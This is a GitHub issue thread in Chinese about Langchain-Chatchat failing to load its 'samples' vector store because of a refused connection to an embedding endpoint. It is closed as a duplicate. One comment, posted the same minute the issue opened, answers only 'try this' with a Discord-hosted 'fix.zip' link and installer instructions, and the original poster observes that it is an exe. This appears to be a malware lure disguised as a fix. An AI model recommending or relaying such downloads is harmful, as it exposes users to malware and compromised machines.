### ISSUE TITLE
[BUG] 简洁阐述问题 / 向量库 samples 加载失败

### ISSUE THREAD

**Issue by ucasiggcas** [chatchat-space/Langchain-Chatchat#4902] opened 2024-09-03 06:01 UTC
按照步骤执行的，
chatchat kb -r
这一步报错了。

2024-09-03 13:59:22.480 | ERROR    | chatchat.server.knowledge_base.kb_cache.faiss_cache:load_vector_store:140 - Error raised by inference endpoint: HTTPConnectionPool(host='0.0.0.0', port=11434): Max retries exceeded with url: /api/embeddings (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f8bf73e6cb0>: Failed to establish a new connection: [Errno 111] Connection refused'))
2024-09-03 13:59:22.481 | ERROR    | chatchat.init_database:worker:61 - 向量库 samples 加载失败

请问咋解决啊？

**Comment by Klevente12** [comment] 2024-09-03 06:01
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ucasiggcas** [comment] 2024-09-03 07:00
我是linux 服务器跑的，你这个是exe文件啊，看下？

**Comment by liunux4odoo** [comment] 2024-09-04 23:23
duplicate of #4878

**Closed by liunux4odoo** 2024-09-04 23:23 UTC
Labels: bug
